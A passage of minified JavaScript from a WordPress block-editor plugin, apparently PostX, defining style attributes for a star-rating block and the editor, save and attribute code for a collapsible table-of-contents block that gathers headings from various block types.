justify-content:{{contentAlignment}}; }"}]},starColor:{type:"string",default:"#F17B2C",style:[{depends:[{key:"starType",condition:"==",value:"outline"}],selector:"{{ULTP}} .ultp-rating-block svg path:last-of-type { stroke: {{starColor}}; }"},{depends:[{key:"starType",condition:"==",value:"fill"}],selector:"{{ULTP}} .ultp-rating-block svg path:last-of-type { stroke:{{starColor}}; fill:{{starColor}}; }"}]},unmarkedColor:{type:"string",default:"#B4B7BF",style:[{depends:[{key:"starType",condition:"==",value:"outline"}],selector:"{{ULTP}} .ultp-rating-block svg path:first-of-type { color: {{unmarkedColor}}; }"},{depends:[{key:"starType",condition:"==",value:"fill"}],selector:"{{ULTP}} .ultp-rating-block svg path:first-of-type { color: {{unmarkedColor}}; color: {{unmarkedColor}}; }"}]},starSize:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-rating-block svg { height:{{starSize}}; width:{{starSize}}; }"}]},starGap:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:"{{ULTP}} .ultp-rating-icon { gap: {{starGap}}; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:"22",unit:"px"},decoration:"none",family:"",weight:400},style:[{depends:[{key:"enableTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-rating-title"}]},titleColor:{type:"string",default:"#3C3C4399",style:[{depends:[{key:"enableTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-rating-title { color:{{titleColor}}; }"}]},titleGap:{type:"object",default:{lg:"12",unit:"px"},style:[{depends:[{key:"enableTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-rating-block { gap:{{titleGap}}; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-wrapper {z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},85562:(e,t,l)=>{"use strict";var o=l(67294),a=l(11645),i=l(63939),n=l(87509),r=l(74921);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/star-rating.svg",alt:"Postx Star Rating Block"}),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/rating.svg"}},edit:a.Z,save:i.Z})},99233:(e,t,l)=>{"use strict";l.d(t,{Z:()=>x});var o=l(67294),a=l(53049),i=l(99838),n=l(92637),r=l(43581),s=l(31760),p=l(64766);const{__}=wp.i18n,{InspectorControls:c,RichText:u,BlockControls:d,useBlockProps:m}=wp.blockEditor,{useEffect:g,useState:y,Fragment:b}=wp.element,{ToolbarGroup:v,Button:h}=wp.components,{getBlocks:f}=wp.data.select("core/block-editor"),{getBlockAttributes:k,getBlockRootClientId:w}=wp.data.select("core/block-editor");function x(e){const[t,l]=y("Content"),{setAttributes:x,name:T,attributes:_,clientId:C,className:E,attributes:{previewImg:S,blockId:P,tag:L,advanceId:I,headText:B,layout:U,collapsible:M,collapsibleType:A,togglePosition:H,topTop:N,toTopIcon:j,sticky:Z,listData:O,open:R,close:D,initialCollapsible:z,currentPostId:F}}=e;function W(e){return e.replace(/<\/?[^>]+(>|$)|(amp;)/g,"")}function V(e,t=!0){let l=[];const o=JSON.parse(L||[]);return e.forEach((e=>{if("core/heading"==e.name||"kadence/advancedheading"==e.name){const a=e.attributes.content.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,""),i=void 0!==e.attributes.anchor&&t?e.attributes.anchor:a.replace(/( |<.+?>|&nbsp;)/g,"_");e.attributes.anchor=i,a&&o.includes("h"+e.attributes.level)&&l.push({content:W(e.attributes.content),level:e.attributes.level,link:i})}else if("greenshift-blocks/heading"==e.name){const a=e.attributes.headingContent.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,""),i=void 0!==e.attributes.id&&t?e.attributes.id:a.replace(/( |<.+?>|&nbsp;)/g,"_");e.attributes.id=i,a&&o.includes(e.attributes.headingTag)&&l.push({content:W(e.attributes.headingContent),level:Number(e.attributes.headingTag.replace("h","")),link:"gspb_heading-id-"+i})}else if("ultimate-post/heading"==e.name){const a=e.attributes.headingText.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,""),i=""!=e.attributes.advanceId&&t?e.attributes.advanceId:a.replace(/( |<.+?>|&nbsp;)/g,"_");e.attributes.advanceId=i,a&&o.includes(e.attributes.headingTag)&&l.push({content:W(e.attributes.headingText),level:Number(e.attributes.headingTag.replace("h","")),link:i})}else if("uagb/advanced-heading"==e.name){const a=e.attributes.headingTitle.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,""),i=void 0!==e.attributes.anchor&&t?e.attributes.anchor:a.replace(/( |<.+?>|&nbsp;)/g,"_");e.attributes.anchor=i,a&&o.includes(e.attributes.headingTag)&&l.push({content:W(e.attributes.headingTitle),level:e.attributes.level,link:i})}else if("uagb/container"==e.name)e.innerBlocks?.length&&(l=[...l,...V(e.innerBlocks)]);else if("ugb/heading"==e.name){const a=e.attributes.title.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,""),i=void 0!==e.attributes.anchor&&t?e.attributes.anchor:a.replace(/( |<.+?>|&nbsp;)/g,"_");if(e.attributes.anchor=i,a){const t=e.attributes.titleTag?e.attributes.titleTag:"h2";o.includes(t)&&l.push({content:W(e.attributes.title),level:Number(t.replace("h","")),link:i})}}else if("ultimate-post/post-grid-1"==e.name||"ultimate-post/post-grid-2"==e.name||"ultimate-post/post-grid-3"==e.name||"ultimate-post/post-grid-4"==e.name||"ultimate-post/post-grid-5"==e.name||"ultimate-post/post-grid-6"==e.name||"ultimate-post/post-grid-7"==e.name||"ultimate-post/post-list-1"==e.name||"ultimate-post/post-list-2"==e.name||"ultimate-post/post-list-3"==e.name||"ultimate-post/post-list-4"==e.name||"ultimate-post/post-module-1"==e.name||"ultimate-post/post-module-2"==e.name||"ultimate-post/post-slider-1"==e.name){if(e.attributes.headingText&&e.attributes.headingShow){const t=e.attributes.headingText.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,""),o=t.replace(/( |<.+?>|&nbsp;)/g,"_");e.attributes.advanceId=o,t&&l.push({content:W(e.attributes.headingText),level:Number(e.attributes.headingTag.replace("h","")),link:o})}}else"ultimate-post/row"==e.name||"ultimate-post/column"==e.name?e.innerBlocks?.length&&(l=[...l,...V(e.innerBlocks)]):"core/columns"==e.name?e.innerBlocks.forEach((e=>{"core/column"==e.name&&(l=[...l,...V(e.innerBlocks)])})):"core/group"==e.name?e.innerBlocks?.length&&(l=[...l,...V(e.innerBlocks)]):"ub/content-toggle-block"==e.name&&e.innerBlocks.forEach((e=>{if("ub/content-toggle-panel-block"==e.name&&e.attributes.panelTitle){const t=e.attributes.panelTitle.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,"").replace(/( |<.+?>|&nbsp;)/g,"_"),a=e.attributes.titleTag?e.attributes.titleTag:"h2";e.attributes.toggleID=t,o.includes(a)&&l.push({content:W(e.attributes.panelTitle),level:Number(a.replace("h","")),link:t})}}))})),l}g((()=>{const e=C.substr(0,6),t=k(w(C));(0,a.qi)(x,t,F,C),P?P&&P!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||x({blockId:e})):x({blockId:e})}),[C]),g((()=>{!function(){const e=V(f());function t(e,l){const o=e.length-1;0===e.length||e[0].level===l.level?e.push(Object.assign({},l)):e[o].level<l.level?e[o].child?t(e[o].child,l):e[o].child=[Object.assign({},l)]:e[o+1]=l}const l=[];e.forEach((e=>t(l,e))),x({listData:JSON.stringify(l)})}()}),[_]);const G={setAttributes:x,name:T,attributes:_,setSection:l,section:t,clientId:C};let q;if(P&&(q=(0,i.Kh)(_,"ultimate-post/table-of-content",P,(0,a.k0)())),S)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:S});const $=m({...I&&{id:I},className:`ultp-block-${P} ${E} ${1==Z?"ultp-toc-sticky":""}`});return(0,o.createElement)(b,null,(0,o.createElement)(d,null,(0,o.createElement)(v,null,(0,o.createElement)(h,{label:"Reset",className:"ultp-btn-reset",icon:"image-rotate","aria-haspopup":"true",tooltip:"Reset Table of Content",onClick:()=>V(f(),!1)},"Reset"))),(0,o.createElement)(c,null,(0,o.createElement)(r.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6822",store:G}),(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,store:G,title:"General",include:[{position:0,data:{type:"layout",block:"table-of-content",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/toc/toc1.png",label:__("Style 1","ultimate-post"),value:"style1",pro:!1},{img:"assets/img/layouts/toc/toc2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!1},{img:"assets/img/layouts/toc/toc3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0},{img:"assets/img/layouts/toc/toc4.png",label:__("Style 4","ultimate-post"),value:"style4",pro:!0},{img:"assets/img/layouts/toc/toc5.png",label:__("Style 5","ultimate-post"),value:"style5",pro:!0},{img:"assets/img/layouts/toc/toc6.png",label:__("Style 6","ultimate-post"),value:"style6",pro:!0},{img:"assets/img/layouts/toc/toc7.png",label:__("Style 7","ultimate-post"),value:"style7",pro:!0},{img:"assets/img/layouts/toc/toc8.png",label:__("Style 8","ultimate-post"),value:"style8",pro:!0}]}},{position:1,data:{type:"select",key:"tag",label:__("Tag","ultimate-post"),multiple:!0,options:[{value:"h1",label:"H1"},{value:"h2",label:"H2"},{value:"h3",label:"H3"},{value:"h4",label:"H4"},{value:"h5",label:"H5"},{value:"h6",label:"H6"}]}},{position:2,data:{type:"toggle",key:"initialCollapsible",label:__("Initial Close Table","ultimate-post")}}]}),(0,o.createElement)(a.T,{initialOpen:!1,store:G,title:"Heading",include:[{position:1,data:{type:"text",key:"headText",label:__("Header Text","ultimate-post")}},{position:2,data:{type:"color",key:"headColor",label:__("Color","ultimate-post")}},{position:3,data:{type:"color",key:"headBg",label:__("Background","ultimate-post")}},{position:4,data:{type:"typography",key:"headTypo",label:__("Typography","ultimate-post")}},{position:5,data:{type:"border",key:"headBorder",label:__("Border","ultimate-post")}},{position:6,data:{type:"dimension",key:"headRadius",label:__("Button Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:7,data:{type:"dimension",key:"headPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),(0,o.createElement)(a.T,{initialOpen:!1,store:G,title:__("List Body","ultimate-post"),include:[{position:1,data:{type:"select",key:"hoverStyle",label:__("Hover Style","ultimate-post"),pro:!0,options:[{value:"none",label:"Select"},{value:"style1",label:"Style 1"},{value:"style2",label:"Style 2"},{value:"style3",label:"Style 3"},{value:"style4",label:"Style 4"},{value:"style5",label:"Style 5"}]}},{position:2,data:{type:"range",key:"borderWidth",label:__("Border Width","ultimate-post"),min:0,max:10,step:1,unit:!1,responsive:!1}},{position:3,data:{type:"color",key:"borderColor",label:__("Border Color","ultimate-post")}},{position:4,data:{type:"toggle",key:"sticky",pro:!0,label:__("Enable Sticky","ultimate-post")}},{position:5,data:{type:"tag",key:"stickyPosition",label:__("Sticky Position","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")},{value:"top",label:__("Top","ultimate-post")}]}},{position:6,data:{type:"range",key:"listWidth",label:__("Width","ultimate-post"),min:0,max:700,step:1,unit:!0,responsive:!0}},{position:7,data:{type:"range",key:"listSpacingX",label:__("Gap Between Lists","ultimate-post"),min:0,max:50,step:1,unit:!1,responsive:!0}},{position:8,data:{type:"range",key:"listSpacingY",label:__("Spacing Y","ultimate-post"),min:0,max:100,step:1,unit:!1,responsive:!0}},{position:9,data:{type:"color",key:"listColor",label:__("Color","ultimate-post")}},{position:10,data:{type:"color",key:"listHoverColor",label:__("Hover Color","ultimate-post")}},{position:11,data:{type:"color",key:"listBg",label:__("Background Color","ultimate-post")}},{position:12,data:{type:"typography",key:"listTypo",label:__("Typography","ultimate-post")}},{position:13,data:{type:"dimension",key:"listPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),(0,o.createElement)(a.T,{depend:"collapsible",initialOpen:!1,store:G,title:__("Collapsible","ultimate-post"),include:[{position:1,data:{type:"tag",key:"togglePosition",label:__("Button Position","ultimate-post"),options:[{value:"withTitle",label:__("Beside Title","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}},{position:2,data:{type:"tag",key:"collapsibleType",label:__("Collapsible Type","ultimate-post"),options:[{value:"text",label:__("Text","ultimate-post")},{value:"icon",label:__("Icon","ultimate-post")}]}},{position:3,data:{type:"text",key:"open",label:__("Open Text","ultimate-post")}},{position:4,data:{type:"text",key:"close",label:__("Close Text","ultimate-post")}},{position:6,data:{type:"color",key:"collapsibleColor",label:__("Color","ultimate-post")}},{position:7,data:{type:"color",key:"collapsibleBg",label:__("Background","ultimate-post")}},{position:8,data:{type:"color",key:"collapsibleHoverColor",label:__("Hover Color","ultimate-post")}},{position:9,data:{type:"color",key:"collapsibleHoverBg",label:__("Hover Background","ultimate-post")}},{position:10,data:{type:"typography",key:"collapsibleTypo",label:__("Typography","ultimate-post")}},{position:11,data:{type:"border",key:"collapsibleBorder",label:__("Border","ultimate-post")}},{position:12,data:{type:"dimension",key:"collapsibleRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:13,data:{type:"dimension",key:"collapsiblePadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),(0,o.createElement)(a.T,{depend:"topTop",initialOpen:!1,store:G,title:__("Back To Top","ultimate-post"),include:[{position:1,data:{type:"tag",key:"toTopPosition",label:__("Position","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}},{position:2,data:{type:"tag",key:"toTopIcon",label:__("Icon","ultimate-post"),options:[{value:"arrowUp2",label:__("Angle","ultimate-post")},{value:"longArrowUp2",label:__("Arrow","ultimate-post")},{value:"caretArrow",label:__("Caret","ultimate-post")}]}},{position:3,data:{type:"color",key:"toTopColor",label:__("Color","ultimate-post")}},{position:4,data:{type:"color",key:"toTopBg",label:__("Background","ultimate-post")}},{position:5,data:{type:"color",key:"toTopHoverColor",label:__("Hover Color","ultimate-post")}},{position:6,data:{type:"color",key:"toTopHoverBg",label:__("Hover Background","ultimate-post")}},{position:7,data:{type:"range",key:"toTopSize",label:__("Icon Size","ultimate-post"),min:0,max:80,step:1,unit:!1,responsive:!0}},{position:8,data:{type:"border",key:"toTopBorder",label:__("Border","ultimate-post")}},{position:9,data:{type:"dimension",key:"toTopRadius",label:__("Button Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:10,data:{type:"dimension",key:"toTopPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}]})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:G}),(0,o.createElement)(a.Mg,{store:G}),(0,o.createElement)(a.iv,{store:G}))),(0,a.dH)()),(0,o.createElement)(s.Z,{include:[{type:"template"},{type:"layout",block:"table-of-content",key:"layout",options:[{img:"assets/img/layouts/toc/toc1.png",label:__("Style 1","ultimate-post"),value:"style1",pro:!1},{img:"assets/img/layouts/toc/toc2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!1},{img:"assets/img/layouts/toc/toc3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0},{img:"assets/img/layouts/toc/toc4.png",label:__("Style 4","ultimate-post"),value:"style4",pro:!0},{img:"assets/img/layouts/toc/toc5.png",label:__("Style 5","ultimate-post"),value:"style5",pro:!0},{img:"assets/img/layouts/toc/toc6.png",label:__("Style 6","ultimate-post"),value:"style6",pro:!0},{img:"assets/img/layouts/toc/toc7.png",label:__("Style 7","ultimate-post"),value:"style7",pro:!0},{img:"assets/img/layouts/toc/toc8.png",label:__("Style 8","ultimate-post"),value:"style8",pro:!0}]}],store:G}),(0,o.createElement)("div",$,q&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:q}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-block-toc"},(0,o.createElement)("div",{className:"ultp-toc-header"},(0,o.createElement)("div",{className:"ultp-toc-heading"},(0,o.createElement)(u,{key:"editable",tagName:"span",placeholder:__("Heading Table of Contents…","ultimate-post"),onChange:e=>x({headText:e}),value:B})),M&&(0,o.createElement)("div",{className:`ultp-collapsible-toggle ${z?"ultp-toggle-collapsed":""} ${"right"==H?"ultp-collapsible-right":""}`},"icon"!==A?(0,o.createElement)(b,null,(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-text ultp-collapsible-open",onClick:e=>{e.preventDefault()}},"[",R,"]"),(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-text ultp-collapsible-hide",onClick:e=>{e.preventDefault()}},"[",D,"]")):(0,o.createElement)(b,null,(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-icon ultp-collapsible-open",onClick:e=>{e.preventDefault()}},p.ZP.arrowUp2),(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-icon ultp-collapsible-hide",onClick:e=>{e.preventDefault()}},p.ZP.arrowUp2)))),(0,o.createElement)("div",{className:`ultp-block-toc-${U} ultp-block-toc-body`},(0,a.Ko)(O,U)),N&&(0,o.createElement)("a",{href:"#",className:"ultp-toc-backtotop tocshow"},p.ZP[j])))))}},57098:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(53049),i=l(64766);const{Fragment:n}=wp.element,{useBlockProps:r}=wp.blockEditor;function s(e){const{blockId:t,advanceId:l,headText:s,collapsible:p,collapsibleType:c,togglePosition:u,topTop:d,toTopIcon:m,layout:g,sticky:y,listData:b,open:v,close:h,initialCollapsible:f,className:k}=e.attributes,w=r.save({...l&&{id:l},className:`ultp-block-${t} ${k} ${1==y?"ultp-toc-sticky":""}`});return(0,o.createElement)("div",w,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-block-toc"},(0,o.createElement)("div",{className:"ultp-toc-header"},(0,o.createElement)("div",{className:"ultp-toc-heading"},s),p&&(0,o.createElement)("div",{className:`ultp-collapsible-toggle ${f?"ultp-toggle-collapsed":""} ${"right"==u?"ultp-collapsible-right":""}`},"icon"!==c?(0,o.createElement)(n,null,(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-text ultp-collapsible-open",onClick:e=>{e.preventDefault()}},"[",v,"]"),(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-text ultp-collapsible-hide",onClick:e=>{e.preventDefault()}},"[",h,"]")):(0,o.createElement)(n,null,(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-icon ultp-collapsible-open",onClick:e=>{e.preventDefault()}},"_ultp_toc_ic_arrowUp2_ultp_toc_ic_end_"),(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-icon ultp-collapsible-hide",onClick:e=>{e.preventDefault()}},"_ultp_toc_ic_arrowUp2_ultp_toc_ic_end_")))),(0,o.createElement)("div",{className:`ultp-block-toc-${g} ultp-block-toc-body`,style:{display:f?"none;":"block;"}},(0,a.Ko)(b,g)),d&&(0,o.createElement)("a",{href:"#",className:"ultp-toc-backtotop tocshow"},i.ZP[m]))))}},66838:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},listData:{type:"string",default:"[]"},currentPostId:{type:"string",default:""},tag:{type:"string",default:'["h1","h2","h3","h4","h5","h6"]'},collapsible:{type:"boolean",default:!0},initialCollapsible:{type:"boolean",default:!1},topTop:{type:"boolean",default:!1},headText:{type:"string",default:"Table of Contents"},headColor:{type:"string",default:"#222",style:[{selector:"{{ULTP}} .ultp-toc-heading { color:{{headColor}}; }"}]},headBg:{type:"string",default:"#f7f7f7",style:[{selector:"{{ULTP}} .ultp-toc-header { background:{{headBg}}; }"}]},headTypo:{type:"object",default:{openTypography:1,size:{lg:22,unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:"",weight:700},style:[{selector:"{{ULTP}} .ultp-toc-heading"}]},headBorder:{type:"object",default:{openBorder:1,width:{top:0,right:0,bottom:1,left:0},color:"#eee",type:"solid"},style:[{selector:"{{ULTP}} .ultp-toc-header"}]},headRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-toc-header { border-radius:{{headRadius}}; }"}]},headPadding:{type:"object",default:{lg:{top:"16",bottom:"16",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-toc-header { padding:{{headPadding}}; }"}]},layout:{type:"string",default:"style1"},hoverStyle:{type:"string",default:"none",style:[{depends:[{key:"hoverStyle",condition:"==",value:"none"}]},{depends:[{key:"hoverStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover { border-bottom-style:dotted; }"},{depends:[{key:"hoverStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover { border-bottom-style:solid; }"},{depends:[{key:"hoverStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover { border-bottom-style:dashed; }"},{depends:[{key:"hoverStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover { text-decoration:underline; }"},{depends:[{key:"hoverStyle",condition:"==",value:"style5"}],selector:'{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a { position:relative; } \n                {{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:after {content: ""; position:absolute; left:0; width:0; top:calc(100% + 2px); transition: width 350ms,opacity 350ms;} \n                {{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover:after { opacity:1; width:100%; }'}]},borderColor:{type:"string",default:"#037fff",style:[{depends:[{key:"hoverStyle",condition:"==",value:["style1","style2","style3"]}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover { border-bottom-color:{{borderColor}}; }"},{depends:[{key:"hoverStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:after {background:{{borderColor}}; }"}]},borderWidth:{type:"string",default:"1",style:[{depends:[{key:"hoverStyle",condition:"==",value:["style1","style2","style3"]}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover {border-bottom-width: {{borderWidth}}px; }"},{depends:[{key:"hoverStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:after {height:{{borderWidth}}px; }"}]},sticky:{type:"boolean",default:!1},stickyPosition:{type:"string",default:"right",style:[{depends:[{key:"stickyPosition",condition:"==",value:"left"},{key:"sticky",condition:"==",value:!0}],selector:"{{ULTP}}.ultp-toc-sticky.ultp-toc-scroll { right:auto;left:0; }"},{depends:[{key:"stickyPosition",condition:"==",value:"right"},{key:"sticky",condition:"==",value:!0}],selector:"{{ULTP}}.ultp-toc-sticky.ultp-toc-scroll { right:0;left:auto; }"},{depends:[{key:"stickyPosition",condition:"==",value:"top"},{key:"sticky",condition:"==",value:!0}],selector:"{{ULTP}}.ultp-toc-sticky.ultp-toc-scroll { top:0;left:0;right:0;margin: 0 auto; } \n                .admin-bar .ultp-toc-sticky.ultp-toc-scroll { top: 32px}"}]},listWidth:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"sticky",condition:"==",value:!0}],selector:"{{ULTP}}.wp-block-ultimate-post-table-of-content.ultp-toc-sticky { max-width: {{listWidth}}; width: {{listWidth}}; } \n                .single {{ULTP}}.wp-block-ultimate-post-table-of-content.ultp-toc-sticky { max-width: {{listWidth}}; width: {{listWidth}}; }"},{depends:[{key:"sticky",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-wrapper { max-width: {{listWidth}}; width: {{listWidth}}; } \n                .single {{ULTP}} .ultp-block-wrapper { max-width: {{listWidth}}; width: {{listWidth}}; }"}]},listSpacingX:{type:"object",default:{lg:"8"},style:[{selector:"{{ULTP}} .ultp-toc-lists li { margin-top: {{listSpacingX}}px; }"}]},listSpacingY:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} .ultp-toc-lists li a { margin-left: {{listSpacingY}}px;}"}]},listColor:{type:"string",default:"#222",style:[{selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists li a::before, \n            {{ULTP}} .ultp-block-toc-body .ultp-toc-lists a, \n            {{ULTP}} .ultp-block-toc-body .ultp-toc-lists { color:{{listColor}}; }"}]},listHoverColor:{type:"string",default:"#037fff",style:[{selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists > li a:hover::before, \n            {{ULTP}} .ultp-block-toc-body .ultp-toc-lists > li a:hover { color:{{listHoverColor}}; }"}]},listBg:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-block-toc-body { background-color:{{listBg}}; }"}]},listTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:"",weight:500},style:[{selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists li a"}]},listPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-toc-body { padding:{{listPadding}}; }"}]},togglePosition:{type:"string",default:"right",style:[{depends:[{key:"togglePosition",condition:"==",value:"withTitle"},{key:"collapsible",condition:"==",value:!0}]},{depends:[{key:"togglePosition",condition:"==",value:"right"},{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-toggle.ultp-collapsible-right { margin-left:auto; }"}]},collapsibleType:{type:"string",default:"text",style:[[{depends:{key:"collapsible",condition:"==",value:!0}}]]},open:{type:"string",default:"Open",style:[{depends:[{key:"collapsibleType",condition:"==",value:"text"},{key:"collapsible",condition:"==",value:!0}]}]},close:{type:"string",default:"Close",style:[{depends:[{key:"collapsibleType",condition:"==",value:"text"},{key:"collapsible",condition:"==",value:!0}]}]},collapsibleColor:{type:"string",default:"#037fff",style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-toc .ultp-toc-header .ultp-collapsible-text { color:{{collapsibleColor}}; } \n            {{ULTP}} .ultp-toc-header .ultp-collapsible-toggle a svg { color:{{collapsibleColor}}; }"}]},collapsibleBg:{type:"string",default:"",style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-collapsible-toggle a { background:{{collapsibleBg}}; }"}]},collapsibleHoverColor:{type:"string",default:"",style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-text:hover { color:{{collapsibleHoverColor}}; } \n            {{ULTP}} .ultp-toc-header .ultp-collapsible-toggle a:hover svg { color:{{collapsibleHoverColor}}; }"}]},collapsibleHoverBg:{type:"string",default:"",style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-toggle a:hover { background:{{collapsibleHoverBg}}; }"}]},collapsibleTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:"",weight:700},style:[{depends:[{key:"collapsibleType",condition:"==",value:"text"},{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-text"}]},collapsibleBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-toggle a"}]},collapsibleRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-toggle a { border-radius:{{collapsibleRadius}}; }"}]},collapsiblePadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-toggle a { padding:{{collapsiblePadding}}; }"}]},toTopPosition:{type:"string",default:"right",style:[{depends:[{key:"toTopPosition",condition:"==",value:"left"},{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop { left:40px;right:auto; }"},{depends:[{key:"toTopPosition",condition:"==",value:"right"},{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop { right:40px;left:auto; }\n                .editor-styles-wrapper .ultp-toc-backtotop {margin-right: 260px; margin-left: 150px;}"}]},toTopIcon:{type:"string",default:"arrowUp2",style:[[{depends:{key:"topTop",condition:"==",value:!0}}]]},toTopColor:{type:"string",default:"#fff",style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop svg { color:{{toTopColor}}; 